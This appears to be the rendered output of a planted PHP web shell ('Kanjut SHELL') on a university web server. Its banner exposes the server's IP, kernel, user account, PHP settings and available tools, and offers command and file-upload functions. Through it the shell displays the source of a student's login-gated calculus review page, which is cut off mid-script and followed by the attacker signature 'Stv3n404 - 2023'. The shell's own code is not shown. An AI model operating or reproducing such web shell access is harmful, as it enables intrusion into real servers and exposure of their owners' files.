Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 18.116.20.108
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/ajwilcox/www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/ajwilcox/www/Math.php
<!File: Math.php>
<?php
  session_start();

  if (!isset($_SESSION['username'])) {
        $_SESSION['msg'] = "You must log in first";
        header('location: https://zeus.vwu.edu/~ajwilcox/ResearchLogin.php');
  }
  if (isset($_GET['logout'])) {
        session_destroy();
        unset($_SESSION['username']);
        header("location: https://zeus.vwu.edu/~ajwilcox/ResearchLogin.php");
  }
?>

<html>
<head>
        <TITLE> Mathematics Main Page </TITLE>
<meta name="viewport" content="width=device-width, initial-scale=1">
        <link rel="stylesheet" href=" https://zeus.vwu.edu/~ajwilcox/style.css">
</head>
<body>
        <div class="navbar">
                <a href="https://zeus.vwu.edu/~ajwilcox/Research.php">Home</a>
<! Term Progress dropbown button>
    <div class="dropdown">
                 <button class="dropbtn" onclick="myFunction(1)">Term Progression
                <i class="fa fa-caret-down"></i>
        </button>
        <div class="dropdown-content" id="myDropdown1">
                <a href="https://zeus.vwu.edu/~ajwilcox/Term1.php">Term 1 Progress</a>
                <a href="https://zeus.vwu.edu/~ajwilcox/Term2.php">Term 2 Progress</a>
                <a href="https://zeus.vwu.edu/~ajwilcox/Term3.php">Term 3 Progress</a>
                <a href="https://zeus.vwu.edu/~ajwilcox/Term4.php">Term 4 Progress</a>
                <a href="https://zeus.vwu.edu/~ajwilcox/Term5.php">Term 5 Progress</a>
                <a href="https://zeus.vwu.edu/~ajwilcox/Term6.php">Term 6 Progress</a>
                <a href="https://zeus.vwu.edu/~ajwilcox/Term7.php">Term 7 Progress</a>
                <a href="https://zeus.vwu.edu/~ajwilcox/Term8.php">Term 8 Progress</a>
                <a href="https://zeus.vwu.edu/~ajwilcox/Term9.php">Term 9 Progress</a>
                <a href="https://zeus.vwu.edu/~ajwilcox/Term10.php">Term 10 Progress</a>
                </div>
                </div>
                <a href="https://zeus.vwu.edu/~ajwilcox/Math.php">Mathematics</a>
                <a href="https://zeus.vwu.edu/~ajwilcox/CompSci.php">Computer Science </a>
               <a href="https://zeus.vwu.edu/~ajwilcox/ResearchAbout.php">Project Background</a>
                <a href="https://zeus.vwu.edu/~ajwilcox/ResearchLogin.php?logout='1'"> Logout</a>
                </div>

<! Page Layout finishes here for navbar>


        <center>
        <h1>Mathematics Home Page</h1>
	<h3>This page can be used to refreshen one's knowledge on a few math courses offered here at wesleyan.</h3> 
	Simple topics within Calculus I and Caluclus II are included within this website.
	<hr>
	<p>
	The links below will lead you to a quick review on the specified subjects. 
	Using these to refresh your memory on easy topics that  you use every day is a good idea.
	<P>  
	<a href="https://zeus.vwu.edu/~ajwilcox/Calc1.php">Calculus I</a> &nbsp;&nbsp;
        <a href="https://zeus.vwu.edu/~ajwilcox/Calc2.php">Calculus II</a>
	<P>
	<hr>
	<P>
	Want to take the derivatives of polynomails? Try the link below!
	<p>
	<a href="https://zeus.vwu.edu/~ajwilcox/deriv.php">Polynomial Derivative</a>
	<hr>
	<p>
	Having trouble with a math course and need someone else to struggle with?
	<p>
	No seriously, struggling and making mistakes at first is a big part of learning each concept in its own entirey.
	<P>
	Well below is a link that caters to anyone who is to shy to ask for help in person.
	If you don't want to enter your information, you can also search for someone else.
	<P> 
	Try it out!
	<P>
      	<a href="https://zeus.vwu.edu/~ajwilcox/Mathtable.php">Find others to study with here! </a>
     	<HR>
	<P>
	<P>
	<img src="https://www.thoughtco.com/thmb/NzS6TkT1LLDFaa9jtI9yA2AHrA0=/768x0/filters:no_upscale():max_bytes(150000):strip_icc():format(webp)/young-boy-writes-math-equations-on-chalkboard-168351254-5ad90020ba61770036501446.jpg" alt="WritingChalk">
        </center>
<script>
/* When the user clicks on the button,
toggle between hiding and showing the dropdown content */

Stv3n404 - 2023